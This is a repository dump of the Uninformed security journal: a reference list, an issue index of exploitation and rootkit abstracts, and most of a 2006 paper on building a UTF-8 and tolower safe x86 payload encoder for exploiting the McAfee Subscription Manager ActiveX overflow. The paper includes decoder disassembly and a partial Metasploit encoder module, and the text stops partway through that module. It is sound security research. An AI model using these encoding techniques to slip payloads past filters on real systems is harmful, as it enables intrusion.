||||
Phrack.org. Shadow Walker.
|
||||
http://www.phrack.org/phrack/63/p63-0x08_Raising_The_Bar_For_Windows_Rootkit_Detection.txt;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Rootkit.com. FU.
|
||||
http://rootkit.com/project.php?id=12;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Rootkit.com. Please don't greap me!.
|
||||
http://rootkit.com/newsread.php?newsid=316;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Uninformed.org. futo.
|
||||
http://uninformed.org/?v=3&a=7&t=sumry;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Windows Hardware Developer Central. Debugging Tools for Windows.
|
||||
http://www.microsoft.com/whdc/devtools/debugging/default.mspx;
|
||||
Accessed May. 30, 2006.
|
2070
uninformed/4.8.txt
Normal file
File diff suppressed because it is too large
Load diff
30
uninformed/4.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
Engineering in Reverse
|
||||
Improving Automated Analysis of Windows x64 Binaries
|
||||
skape
|
||||
As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can be performed prior to doing code or data flow analysis can be useful in getting a better understanding for how a binary operates. To that point, this paper gives a brief explanation of some of the changes that have been made to support Windows x64 binaries. From there, a few basic techniques are illustrated that can be used to improve the process of identifying functions, annotating their stack frames, and describing their exception handler relationships. Source code to an example IDA plugin is also included that shows how these techniques can be implemented.
|
||||
txt | code.tgz | pdf | html
|
||||
|
||||
Exploitation Technology
|
||||
Exploiting the Otherwise Non-Exploitable on Windows
|
||||
Skywing & skape
|
||||
This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such as NULL pointer dereferences. To facilitate this, an attacker gains control of the top-level unhandled exception filter for a process in an indirect fashion. While there has been previous work illustrating the usefulness in gaining control of the top-level unhandled exception filter, Microsoft has taken steps in XPSP2 and beyond, such as function pointer encoding, to prevent attackers from being able to overwrite and control the unhandled exception filter directly. While this security enhancement is a marked improvement, it is still possible for an attacker to gain control of the top-level unhandled exception filter by taking advantage of a design flaw in the way unhandled exception filters are chained. This approach, however, is limited by an attacker's ability to control the chaining of unhandled exception filters, such as through the loading and unloading of DLLs. This does reduce the global impact of this approach; however, there are some interesting cases where it can be immediately applied, such as with Internet Explorer.
|
||||
txt | pdf | html
|
||||
|
||||
General Research
|
||||
Abusing Mach on Mac OS X
|
||||
nemo
|
||||
This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, such as securelevel. Furthermore, examples are given that show how Mach functions can be used to supplement the limited ptrace functionality included in Mac OS X.
|
||||
txt | pdf | html
|
||||
|
||||
Rootkit Technology
|
||||
GREPEXEC: Grepping Executive Objects from Pool Memory
|
||||
bugcheck
|
||||
As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to enumerate maintained lists is no longer enough to provide effective cross-view detection. To that point, scanning virtual memory for object signatures has been shown to provide useful, but limited, results. The following paper outlines the theory and practice behind scanning memory for hidden objects. This method relies upon the ability to safely reference the Windows system virtual address space and also depends upon building and locating effective memory signatures. Using this method as a base, suggestions are made as to what actions might be performed once objects are detected. The paper also provides a simple example of how object-independent signatures can be built and used to detect several different kernel objects on all versions of Windows NT+. Due to time constraints, the source code associated with this paper will be made publicly available in the near future.
|
||||
txt | pdf | html
|
||||
|
||||
What Were They Thinking?
|
||||
Anti-Virus Software Gone Wrong
|
||||
Skywing
|
||||
Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default configuration of newly-sold computer systems. As a result, it is becoming increasingly important that anti-virus software be well-designed, secure by default, and interoperable with third-party applications. Software that is installed and running by default constitutes a prime target for attack and, as such, it is especially important that said software be designed with security and interoperability in mind. In particular, this article provides examples of issues found in well-known anti-virus products. These issues range from not properly validating input from an untrusted source (especially within the context of a kernel driver) to failing to conform to API contracts when hooking or implementing an intermediary between applications and the underlying APIs upon which they rely. For popular software, or software that is installed by default, errors of this sort can become a serious problem to both system stability and security. Beyond that, it can impact the ability of independent software vendors to deploy functioning software on end-user systems.
|
||||
txt | pdf | html
|
||||
|
817
uninformed/5.1.txt
Normal file
|
@ -0,0 +1,817 @@
|
|||
Implementing a Custom X86 Encoder
|
||||
Aug, 2006
|
||||
skape
|
||||
mmiller@hick.org
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper describes the process of implementing a custom
|
||||
encoder for the x86 architecture. To help set the stage, the McAfee
|
||||
Subscription Manager ActiveX control vulnerability, which was discovered
|
||||
by eEye, will be used as an example of a vulnerability that requires the
|
||||
implementation of a custom encoder. In particular, this vulnerability
|
||||
does not permit the use of uppercase characters. To help make things
|
||||
more interesting, the encoder described in this paper will also avoid
|
||||
all characters above 0x7f. This will make the encoder both UTF-8 safe
|
||||
and tolower safe.
|
||||
|
||||
Challenge: The author believes that a UTF-8 safe and tolower safe
|
||||
encoder could most likely be implemented in a much more optimized
|
||||
fashion that incurs far less overhead in terms of size. If any reader
|
||||
has ideas about ways in which this might be approached, feel free to
|
||||
contact the author. A bonus challenge would be to identify a geteip
|
||||
technique that can be used with these character limitations.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
In the month of August, eEye released an advisory for a stack-based
|
||||
buffer overflow that was found in the McAfee Subscription Manager
|
||||
ActiveX control. The underlying vulnerability was in an insecure call
|
||||
to vsprintf that was exposed through scripting-accessible routines. At a
|
||||
glance, this vulnerability would appear trivial to exploit given that
|
||||
it's a very basic stack overflow. However, once it comes to
|
||||
transmitting a payload, or even a particular return address, certain
|
||||
limiting factors begin to appear. The focus of this paper will center
|
||||
around an exercise in implementing a custom encoder to overcome certain
|
||||
character set limitations. The McAfee Subscription Manager vulnerability
|
||||
will be used as a real-world example of a vulnerability that requires a
|
||||
custom encoder to exploit.
|
||||
|
||||
When it comes to exploiting this vulnerability, the first step is to
|
||||
reproduce the conditions reported in the advisory. As with most
|
||||
vulnerabilities, it's customary to send an arbitrary sequence of bytes,
|
||||
such as A's. However, in this particular exploit, sending a sequence of
|
||||
A's, which equates to 0x41, actually causes the return address to be
|
||||
overwritten with 0x61's which are lowercase a's. Judging from this, it
|
||||
seems obvious that the input string is undergoing a tolower operation
|
||||
and it will not be possible for the payload or return address to contain
|
||||
any uppercase characters.
|
||||
|
||||
Given these character restrictions, it's safe to go forward with writing
|
||||
the exploit. To simply get a proof of concept for code execution, it
|
||||
makes sense to put a series of int3's, represented by the 0xcc opcode,
|
||||
immediately following the return address. The return address could then
|
||||
be pointed to the location of a push esp / ret or some other type of
|
||||
instruction that transfers control to where the series of int3's should
|
||||
reside. Once the vulnerability is triggered, the debugger should break
|
||||
in at an int3 instruction, but that's not actually what happens.
|
||||
Instead, it breaks in on a completely different instruction:
|
||||
|
||||
|
||||
(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!)
|
||||
eax=00000f19 ebx=00000000 ecx=00139438
|
||||
edx=0013a384 esi=00001b58 edi=0013a080
|
||||
eip=0013a02c esp=0013a02c ebp=36213365 iopl=0
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
|
||||
0013a02c ec in al,dx
|
||||
0:000> u eip
|
||||
0013a02c ec in al,dx
|
||||
0013a02d ec in al,dx
|
||||
0013a02e ec in al,dx
|
||||
0013a02f ec in al,dx
|
||||
|
||||
|
||||
Again, it looks like the buffer is undergoing some sort of transformation. One
|
||||
quick thing to notice is that 0xcc + 0x20 = 0xec. This is similar to what
|
||||
would happen when changing an uppercase character to a lowercase character,
|
||||
such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20. It
|
||||
appears that the operation that's performing the case lowering may also be
|
||||
inadvertently performing it on a specific high ASCII range.
|
||||
|
||||
What's actually occurring is that the subscription manager control is calling
_mbslwr, using the statically linked CRT, on a copy of the original input
string. Internally, _mbslwr calls into __crtLCMapStringA. Eventually this will
lead to a call out to kernel32!LCMapStringW. The second parameter to this
routine is dwMapFlags which describes what sort of transformations, if any,
should be performed on the buffer. The _mbslwr routine passes 0x100, or
LCMAP_LOWERCASE. This is what results in the lowering of the string.
|
||||
|
||||
So, given this information, it can be determined that it will not be possible
to use characters from 0x41 through 0x5A inclusive or, for the sake of clarity,
characters from 0xc0 through 0xe0. In actuality, not all of the characters in this
|
||||
range are bad. The main reason this ends up causing problems is because many
|
||||
of the payload encoders out there for x86, including those in Metasploit, rely
|
||||
on characters from these two sets for their decoder stub and subsequent encoded
|
||||
data. For that reason, and for the challenge, it's worth pursuing the
|
||||
implementation of a custom encoder.
|
||||
|
||||
While this particular vulnerability will permit the use of many characters
|
||||
above 0x80, it makes the challenge that much more interesting, and particularly
|
||||
useful, to limit the usable character set to the characters described below.
|
||||
The reason this range is more useful is because the characters are UTF-8 safe
|
||||
and also tolower safe. Like most good payloads, the encoder will also avoid
|
||||
NULL bytes.
|
||||
|
||||
|
||||
0x01 -> 0x40
|
||||
0x5B -> 0x7f
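
The two ranges above translate directly into a byte filter. The following sketch shows one way to check a candidate decoder stub or return address against them. The function names are illustrative and are not part of any existing encoder.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* True if b lies in 0x01..0x40 or 0x5B..0x7F. */
static bool is_safe_byte(uint8_t b)
{
    return (b >= 0x01 && b <= 0x40) || (b >= 0x5B && b <= 0x7F);
}

/* Returns the index of the first disallowed byte, or len if none is found. */
static size_t first_bad_byte(const uint8_t *buf, size_t len)
{
    size_t i;

    for (i = 0; i < len; i++)
        if (!is_safe_byte(buf[i]))
            break;
    return i;
}
```

With this filter, the int3 opcode 0xcc used earlier is rejected along with every uppercase letter and the NULL byte, while lowercase letters and digits pass.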
|
||||
|
||||
|
||||
As with all encoded formats, there are actually two major pieces involved. The
|
||||
first part is the encoder itself. The encoder is responsible for taking a raw
|
||||
buffer and encoding it into the appropriate format. The second part is the
|
||||
decoder, which, as is probably obvious, takes the encoded form and converts it
|
||||
back into the raw form so that it can be executed as a payload. The
|
||||
implementation of these two pieces will be described in the following chapters.
|
||||
|
||||
|
||||
3) Implementing the Decoder
|
||||
|
||||
The implementation of the decoder involves taking the encoded form and
|
||||
converting it back into the raw form. This must all be done using assembly
|
||||
instructions that will execute natively on the target machine after an exploit
|
||||
has succeeded and it must also use only those instructions that fall within the
|
||||
valid character set. To accomplish this, it makes sense to figure out what
|
||||
instructions are available out of the valid character set. To do that, it's as
|
||||
simple as generating all of the permutations of the valid characters in both
|
||||
the first and second byte positions. This provides a pretty good idea of what's
|
||||
available. The end-result of such a process is a list of about 105 unique
|
||||
instructions (independent of operand types). Of those instructions the most
|
||||
interesting are listed below:
|
||||
|
||||
|
||||
add
|
||||
sub
|
||||
imul
|
||||
inc
|
||||
cmp
|
||||
jcc
|
||||
pusha
|
||||
push
|
||||
pop
|
||||
and
|
||||
or
|
||||
xor
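
The enumeration that produced this list can be sketched as a nested loop over the valid character set. The code below only generates the two-byte combinations; feeding them to a disassembler to see which instructions they decode to is a separate step that is not shown. The names are assumptions, and the byte filter is repeated so that the block stands alone.

```c
#include <stddef.h>
#include <stdint.h>

/* True if b lies in 0x01..0x40 or 0x5B..0x7F. */
static int is_safe_byte(uint8_t b)
{
    return (b >= 0x01 && b <= 0x40) || (b >= 0x5B && b <= 0x7F);
}

/*
 * Generates every pair of valid bytes in ascending order. Pairs are stored
 * two bytes each in out[] while space remains; passing NULL only counts.
 * Returns the total number of pairs.
 */
static size_t enumerate_pairs(uint8_t *out, size_t out_cap)
{
    size_t n = 0;

    for (unsigned first = 0; first <= 0xFF; first++) {
        if (!is_safe_byte((uint8_t)first))
            continue;
        for (unsigned second = 0; second <= 0xFF; second++) {
            if (!is_safe_byte((uint8_t)second))
                continue;
            if (out != NULL && 2 * (n + 1) <= out_cap) {
                out[2 * n]     = (uint8_t)first;
                out[2 * n + 1] = (uint8_t)second;
            }
            n++;
        }
    }
    return n;
}
```

The character set contains 101 bytes, so the loop yields 101 * 101 = 10201 candidate pairs.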
|
||||
|
||||
|
||||
Some very useful instructions are available, such as add, xor, push, pop, and a
|
||||
few jcc's. While there's an obvious lack of the traditional mov instruction,
|
||||
it can be made up for through a series of push and pop instructions, if needed.
|
||||
With the set of valid instructions identified, it's possible to begin
|
||||
implementing the decoder. Most decoders will involve three implementation
|
||||
phases. The first phase is used to determine the base address of the decoder
|
||||
stub using a geteip technique. Following that, the encoded data must be
|
||||
transformed from its character-safe form to the form that it will actually
|
||||
execute from. Finally, the decoder must transfer control into the decoded data
|
||||
so that the actual payload can begin executing. These three steps will be
|
||||
described in the following sections.
|
||||
|
||||
In order to better understand the following sections, it's important to
|
||||
describe the general approach that is going to be taken to implement the
|
||||
decoder. The stub header is used to prepare the necessary state for the decode
|
||||
transforms. The transforms themselves take the encoded data, as a series of
|
||||
four byte blocks, and translate it using the process described later in this paper.
|
||||
Finally, execution falls through to the decoded data that is stored in place of
|
||||
the encoded data.
|
||||
|
||||
|
||||
3.1) Determining the Stub's Base Address
|
||||
|
||||
|
||||
The first step in most decoder stubs will require the use of a series of
|
||||
instructions, also referred to as geteip code, that obtain the location of the
|
||||
current instruction pointer. The reason this is necessary is because most
|
||||
decoders will have the encoded data placed immediately following the decoder
|
||||
stub in memory. In order to operate on the encoded data using an absolute
|
||||
address, it is necessary to determine where the data is located. If the decoder
|
||||
stub can determine the address that it's executing from, then it can determine
|
||||
the address of the encoded data immediately following it in memory in a
|
||||
position-independent fashion. As one might expect, the character limitations of
|
||||
this challenge make it quite a bit harder to get the value of the current instruction
|
||||
pointer.
|
||||
|
||||
There are a number of different techniques that can be used to get the value of
|
||||
the instruction pointer on x86. However, the majority of these techniques rely
|
||||
on the use of the call instruction. The problem with the use of the call
|
||||
instruction is that it is generally composed of a high ASCII byte, such as 0xe8
|
||||
or 0xff. Another technique that can be used to get the instruction pointer is
|
||||
the fnstenv FPU instruction. Unfortunately, this instruction is also composed
|
||||
of bytes in the high ASCII range, such as 0xd9. Yet another approach is to use
|
||||
structured exception handling to get the instruction pointer. This is
|
||||
accomplished by registering an exception handler and extracting the Eip value
|
||||
from the CONTEXT structure when an exception is generated. In fact, this
|
||||
approach has even been implemented in entirely alphanumeric form for Windows by
|
||||
SkyLined. Unfortunately, it can't be used in this case because it relies on
|
||||
uppercase characters.
|
||||
|
||||
With all of the known geteip techniques unusable, it seems like some
|
||||
alternative method for getting the base address of the decoder stub will be
|
||||
needed. In the world of alphanumeric encoders, such as SkyLined's Alpha2, it
|
||||
is common for the decoder stub to assume that a certain register contains the
|
||||
base address of the decoder stub. This assumption makes the decoder more
|
||||
complicated to use because it can't simply be dropped into any exploit and be
|
||||
expected to work. Instead, exploits may need to be modified in order to ensure
|
||||
that a register can be found that contains the location of, or some location near,
|
||||
the decoder stub.
|
||||
|
||||
At the time of this writing, the author is not aware of a geteip technique that
|
||||
can be used that is both 7-bit safe and tolower safe. Like the alphanumeric
|
||||
payloads, the decoder described in this paper will be implemented using a
|
||||
register that is explicitly assumed to contain a reference to some address that
|
||||
is near the base address of the decoder stub. For this document, the register
|
||||
that is assumed to hold the address will be ecx, but it is equally possible to
|
||||
use other registers.
|
||||
|
||||
For this particular decoder, determining the base address is just the first
|
||||
step involved in implementing the stub's header. Once the base address has
|
||||
been determined, the decoder must adjust the register that holds the base
|
||||
address to point to the location of the encoded data. The reason this is
|
||||
necessary is because the next step of the decoder, the transforms, depends on
|
||||
knowing the location of the encoded data that they will be operating on. In
|
||||
order to calculate this address, the decoder must add the size of the stub
|
||||
header plus the size of all of the decode transforms to the register that
|
||||
holds the base address. The end result should be that the register will hold
|
||||
the address of the first encoded block.
|
||||
|
||||
The following disassembly shows one way that the stub header might be
|
||||
implemented. In this disassembly, ecx is assumed to point at the beginning of
|
||||
the stub header:
|
||||
|
||||
|
||||
00000000 6A12 push byte +0x12
|
||||
00000002 6B3C240B imul edi,[esp],byte +0xb
|
||||
00000006 60 pusha
|
||||
00000007 030C24 add ecx,[esp]
|
||||
0000000A 6A19 push byte +0x19
|
||||
0000000C 030C24 add ecx,[esp]
|
||||
0000000F 6A04 push byte +0x4
|
||||
|
||||
|
||||
The purpose of the first two instructions is to calculate the number of bytes
|
||||
consumed by all of the decode transforms (which are described in section 3.2). It
|
||||
accomplishes this by multiplying the size of each transform, which is 0xb
|
||||
bytes, by the total number of transforms, which in this example is 0x12. The
|
||||
result of the multiplication, 0xc6, is stored in edi. Since each transform is
|
||||
capable of decoding four bytes of the raw payload, the maximum number of bytes
|
||||
that can be encoded is 508 bytes. This shouldn't be seen as much of a limiting
|
||||
factor, though, as other combinations of imul can be used to account for larger
|
||||
payloads.
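
As a rough check of the arithmetic above, the following Ruby sketch reproduces
the size calculation. The constant and method names are illustrative
assumptions; they do not come from the stub itself or from the framework.

```ruby
# Size in bytes of one decode transform (push dword / pop / add-or-sub / add ecx,[esp]).
TRANSFORM_SIZE = 0x0b
# Largest operand that "push byte" can carry while staying 7-bit safe.
MAX_TRANSFORMS = 0x7f

# Bytes consumed by all decode transforms; this is the value imul leaves in edi.
def transforms_size(count)
  raise ArgumentError, 'count must be between 1 and 0x7f' unless (1..MAX_TRANSFORMS).cover?(count)

  count * TRANSFORM_SIZE
end

# Each transform decodes four bytes of the raw payload.
def max_payload_bytes
  MAX_TRANSFORMS * 4
end

puts format('0x%x', transforms_size(0x12))  # 0xc6
puts max_payload_bytes                      # 508
```

The 508 byte ceiling follows directly from the single-byte push operand, which
is why a different imul combination would be needed for larger payloads.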
|
||||
|
||||
Once the size of the decode transforms has been calculated, pusha is executed
|
||||
in order to place the edi register at the top of the stack. With the value of
|
||||
edi at the top of the stack, the value can be added to the base address
|
||||
register ecx, thus accounting for the number of bytes used by the decode
|
||||
transforms. The astute reader might ask why the value of edi is indirectly
|
||||
added to ecx. Why not just add it directly? The answer, of course, is due to
|
||||
bad characters:
|
||||
|
||||
|
||||
00000000 01F9 add ecx,edi
|
||||
|
||||
|
||||
It's also not possible to simply push edi onto the stack, because the push edi
|
||||
instruction also contains bad characters:
|
||||
|
||||
|
||||
00000000 57 push edi
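
The bad-character reasoning used for these instructions can be sketched as a
small Ruby check. The valid set is the one this paper works with (0x01-0x40 and
0x5b-0x7f); the helper names and the table of candidate encodings are
assumptions made for illustration only.

```ruby
# Valid set used in this paper: 7-bit safe, no NUL, no uppercase ASCII (0x41-0x5a).
def valid_byte?(b)
  (0x01..0x40).cover?(b) || (0x5b..0x7f).cover?(b)
end

# Return the bytes of an instruction encoding that fall outside the valid set.
def bad_bytes(encoding)
  encoding.bytes.reject { |b| valid_byte?(b) }
end

CANDIDATES = {
  'add ecx,edi'   => "\x01\xf9".b,
  'push edi'      => "\x57".b,
  'pusha'         => "\x60".b,
  'add ecx,[esp]' => "\x03\x0c\x24".b
}.freeze

CANDIDATES.each do |name, enc|
  bad = bad_bytes(enc).map { |b| format('0x%02x', b) }
  puts "#{name}: #{bad.empty? ? 'ok' : 'bad ' + bad.join(', ')}"
end
```

The direct forms fail on 0xf9 (high bit set) and 0x57 (an uppercase 'W'),
while the pusha and add ecx,[esp] pair passes.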
|
||||
|
||||
|
||||
Starting with the fifth instruction, the size of the stub header, plus any
|
||||
other offsets that may need to be accounted for, is added to the base address
|
||||
in order to shift the ecx register to point at the start of the encoded data.
|
||||
This is accomplished by simply pushing the number of bytes to add onto the
|
||||
stack and then adding them to the ecx register indirectly by adding through
|
||||
[esp].
|
||||
|
||||
After these instructions are finished, ecx will point to the start of the
|
||||
encoded data. The final instruction in the stub header is a push byte 0x4. This
|
||||
instruction isn't actually used by the stub header, but it's there to set up
|
||||
some necessary state that will be used by the decode transforms. Its use will
|
||||
be described in the next section.
|
||||
|
||||
|
||||
3.2) Transforming the Encoded Data
|
||||
|
||||
The most important part of any decoder is the way in which it transforms the
|
||||
data from its encoded form to its actual form. For example, many of the
|
||||
decoders used in the Metasploit Framework and elsewhere will xor a portion of
|
||||
the encoded data with a key that results in the actual bytes of the original
|
||||
payload being produced. While this is an effective way of obtaining the desired
|
||||
results, it's not possible to use such a technique with the character set
|
||||
limitations currently defined in this paper.
|
||||
|
||||
In order to transform encoded data back to its original form, it must be
|
||||
possible to produce any byte from 0x00 to 0xff using any number of combinations
|
||||
of bytes that fall within the valid character set. This means that this
|
||||
decoder will be limited to using combinations of characters that fall within
|
||||
0x01-0x40 and 0x5b-0x7f. To figure out the best possible means of
|
||||
accomplishing the transformation, it makes sense to investigate each of the
|
||||
useful instructions that were identified earlier in this chapter.
|
||||
|
||||
The bitwise instructions, such as and, or, and xor are not going to be
|
||||
particularly useful to this decoder. The main reason for this is that they are
|
||||
unable to produce values that reside outside of the valid character sets
|
||||
without the aid of a bit shifting instruction. For example, no combination of
and, or, and xor applied to values in the valid character set can produce a
byte with the high bit set, such as 0x80, because every valid character has
that bit clear. The results are confined to values below the 0x80 boundary. These
|
||||
restrictions make the bitwise instructions unusable.
|
||||
|
||||
The imul instruction could be useful in that it is possible to multiply two
|
||||
characters from the valid character set together to produce values that reside
|
||||
outside of the valid character set. For example, multiplying 0x02 by 0x7f
|
||||
produces 0xfe. While this may have its uses, there are two remaining
|
||||
instructions that are actually the most useful.
|
||||
|
||||
The add instruction can be used to produce almost all possible characters.
|
||||
However, it's unable to produce a few specific values. For example, it's
|
||||
impossible to add two valid characters together to produce 0x00. It is also
|
||||
impossible to add two valid characters together to produce 0xff or 0x01.
|
||||
While this limitation may make it appear that the add instruction is unusable,
|
||||
its saving grace is the sub instruction.
|
||||
|
||||
Like the add instruction, the sub instruction is capable of producing almost
|
||||
all possible characters. It is certainly capable of producing the values that
|
||||
add cannot. For example, it can produce 0x00 by subtracting 0x02 from 0x02.
|
||||
It can also produce 0xff by subtracting 0x03 from 0x02. Finally, 0x01 can be
|
||||
produced by subtracting 0x02 from 0x03. However, like the add instruction,
|
||||
there are also characters that the sub instruction cannot produce. These
|
||||
characters include 0x7f, 0x80, and 0x81.
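
The claims about add and sub can be confirmed by brute force. The sketch below
is an illustration rather than part of the encoder: it enumerates every pair of
valid characters and reports which single-byte results are unreachable. It
looks at one byte in isolation and ignores carries between the bytes of a
dword. The names VALID_CHARS, reachable, and missing are hypothetical.

```ruby
# Valid set used in this paper: 0x01-0x40 and 0x5b-0x7f.
VALID_CHARS = ((0x01..0x40).to_a + (0x5b..0x7f).to_a).freeze

# All byte values reachable by applying op to two valid characters, modulo 256.
def reachable(op)
  VALID_CHARS.product(VALID_CHARS).map { |a, b| a.send(op, b) & 0xff }.uniq
end

# Byte values that op can never produce from two valid characters.
def missing(op)
  (0x00..0xff).to_a - reachable(op)
end

puts 'add cannot produce: ' + missing(:+).map { |b| format('0x%02x', b) }.join(', ')
puts 'sub cannot produce: ' + missing(:-).map { |b| format('0x%02x', b) }.join(', ')
puts 'covered by one or the other: ' + (missing(:+) & missing(:-)).empty?.to_s
```

Since the two sets of unreachable values do not overlap, every byte value can
be produced by at least one of the two instructions.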
|
||||
|
||||
Given this analysis, it seems that using add and sub in combination is most
|
||||
likely going to be the best choice when it comes to transforming encoded data
|
||||
for this decoder. With the fundamental operations selected, the next step is
|
||||
to attempt to implement the code that actually performs the transformation. In
|
||||
most decoders, the transform will be accomplished through a loop that simply
|
||||
performs the same operation on a pointer that is incremented by a set number of
|
||||
bytes each iteration. This type of approach results in all of the encoded data
|
||||
being decoded prior to executing it. Using this type of technique is a little
|
||||
bit more complicated for this decoder, though, because it can't simply rely on
|
||||
the use of a static key and it's also limited in terms of what instructions it
|
||||
can use within the loop.
|
||||
|
||||
For these reasons, the author decided to go with an alternative technique for
|
||||
the transformation portion of the decoder stub. Rather than using a loop that
|
||||
iterates over the encoded data, the author chose to use a series of sequential
|
||||
transformations where each block of the encoded data was decoded. This
|
||||
technique has been used before in similar situations. One negative aspect of
|
||||
using this approach over a loop-based approach is that it substantially
|
||||
increases the size of the encoded payload. While figure gives an idea of the
|
||||
structure of the decoder, it doesn't give a concrete understanding of how it's
|
||||
actually implemented. It's at this point that one must descend from the lofty
|
||||
high-level. What better way to do this than diving right into the disassembly?
|
||||
|
||||
|
||||
00000011 6830703C14 push dword 0x143c7030
|
||||
00000016 5F pop edi
|
||||
00000017 0139 add [ecx],edi
|
||||
00000019 030C24 add ecx,[esp]
|
||||
|
||||
|
||||
The form of each transform will look exactly like this one. What's actually
|
||||
occurring is a four byte value is pushed onto the stack and then popped into
|
||||
the edi register. This is done in place of a mov instruction because the mov
|
||||
instruction contains invalid characters. Once the value is in the edi
|
||||
register, it is either added to or subtracted from its respective encoded data
|
||||
block. The result of the add or subtract is stored in place of the previously
|
||||
encoded data. Once the transform has completed, it adds the value at the top
|
||||
of the stack, which was set to 0x4 in the decoder stub header, to the register
|
||||
that holds the pointer into the encoded data. This results in the pointer
|
||||
moving on to the next encoded data block so that the subsequent transform will
|
||||
operate on the correct block.
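
To make the effect of a single transform concrete, here is a minimal Ruby
sketch that models what add [ecx],edi or sub [ecx],edi does to one encoded
block. The method name apply_transform is an assumption; the sample values are
taken from the msfencode output shown later in this paper.

```ruby
# Apply one decode transform to a four byte encoded block.
# imm is the dword pushed by the transform; op is :add or :sub.
def apply_transform(encoded_block, imm, op)
  value  = encoded_block.unpack('V').first         # little-endian dword at [ecx]
  result = op == :add ? value + imm : value - imm  # add [ecx],edi or sub [ecx],edi
  [result & 0xffffffff].pack('V')                  # wrap to 32 bits, stored in place
end

encoded = [0x06, 0x14, 0x67, 0x6b].pack('C4')
decoded = apply_transform(encoded, 0x0d190c3c, :add)
puts decoded.unpack('H*').first   # 42208078
```

Note that the decoded block contains 0x80, a byte outside the valid set, even
though both the immediate and the encoded block use only valid characters.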
|
||||
|
||||
This simple process is all that's necessary to perform the transformations
|
||||
using only valid characters. As mentioned above, one of the negative aspects
|
||||
of this approach is that it does add quite a bit of overhead to the original
|
||||
payload. For each four byte block, 11 bytes of overhead are added. The
|
||||
approach is also limited by the fact that if there is ever a portion of the raw
|
||||
payload that contains characters that add cannot handle, such as 0x00, and also
|
||||
contains characters that sub cannot handle, such as 0x80, then it will not be
|
||||
possible to encode it.
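
The two limitations above, size overhead and unencodable blocks, can be
expressed in a few lines of Ruby. This is a sketch under the assumptions
stated in this section (a 0x11 byte stub header, 0xb bytes per transform);
block_strategy and encoded_size are hypothetical helper names.

```ruby
ADD_BAD = [0x00, 0x01, 0xff].freeze  # bytes that add cannot produce
SUB_BAD = [0x7f, 0x80, 0x81].freeze  # bytes that sub cannot produce

# Which instruction could decode this four byte block, if any.
def block_strategy(block)
  bytes = block.bytes
  return :add if (bytes & ADD_BAD).empty?
  return :sub if (bytes & SUB_BAD).empty?

  nil
end

# Total encoded size: stub header + one transform per block + the encoded blocks.
def encoded_size(raw_len, header_size = 0x11)
  blocks = (raw_len + 3) / 4
  header_size + blocks * 0x0b + blocks * 4
end

puts block_strategy("\x42\x20\x80\x78".b).inspect  # :add
puts block_strategy("\x00\x80\x41\x41".b).inspect  # nil
puts encoded_size(8)                               # 47
```

A block that mixes a byte from each list, such as 0x00 together with 0x80,
yields nil, which corresponds to the case where encoding fails.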
|
||||
|
||||
|
||||
3.3) Transferring Control to the Decoded Data
|
||||
|
||||
Due to the way the decoder is structured, there is no need for it to include
|
||||
code that directly transfers control to the decoded data. Since this decoder
|
||||
does not use any sort of looping, execution control will simply fall through to
|
||||
the decoded data after all of the transformations have completed.
|
||||
|
||||
|
||||
4) Implementing the Encoder
|
||||
|
||||
The encoder portion is made up of code that runs on an attacker's machine prior
|
||||
to exploiting a target. It converts the actual payload that will be executed
|
||||
into the encoded format and then transmits the encoded form as the payload.
|
||||
Once the target begins executing code, the decoder, as described in chapter 3,
|
||||
converts the encoded payload back into its raw form and then executes it.
|
||||
|
||||
For the purposes of this document, the client-side encoder was implemented in
|
||||
the 3.0 version of the Metasploit Framework as an encoder module for x86. This
|
||||
chapter will describe what was actually involved in implementing the encoder
|
||||
module for the Metasploit Framework.
|
||||
|
||||
The very first step involved in implementing the encoder is to create the
|
||||
appropriate file and set up the class so that it can be loaded into the
|
||||
framework. This is accomplished by placing the encoder module's file in the
|
||||
appropriate directory, which in this case is modules/encoders/x86. The name of
|
||||
the module's file is important only in that the module's reference name is
|
||||
derived from the filename. For example, this encoder can be referenced as
|
||||
x86/avoid_utf8_tolower based on its filename. In this case, the module's
filename is avoid_utf8_tolower.rb. Once the file is created in the appropriate
|
||||
location, the next step is to define the class and provide the framework with
|
||||
the appropriate module information.
|
||||
|
||||
To define the class, it must be placed in the appropriate namespace that
|
||||
reflects where it is located on the filesystem. In this case, the module is placed
|
||||
in the Msf::Encoders::X86 namespace. The name of the class itself is not
|
||||
important so long as it is unique within the namespace. When defining the
|
||||
class, it is important that it inherit from the Msf::Encoder base class at some
|
||||
level. This ensures that it implements all the required methods for an encoder
|
||||
to function when the framework is interacting with it.
|
||||
|
||||
At this point, the class definition should look something like this:
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
module Encoders
|
||||
module X86
|
||||
|
||||
class AvoidUtf8 < Msf::Encoder
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
With the class defined, the next step is to create a constructor and to pass
|
||||
the appropriate module information down to the base class in the form of the
|
||||
info hash. This hash contains information about the module, such as name,
|
||||
version, authorship, and so on. For encoder modules, it also conveys
|
||||
information about the type of encoder that's being implemented as well as
|
||||
information specific to the encoder, like block size and key size. For this
|
||||
module, the constructor might look something like this:
|
||||
|
||||
|
||||
def initialize
  super(
    'Name'        => 'Avoid UTF8/tolower',
    'Version'     => '$Revision: 1.3 $',
    'Description' => 'UTF8 Safe, tolower Safe Encoder',
    'Author'      => 'skape',
    'Arch'        => ARCH_X86,
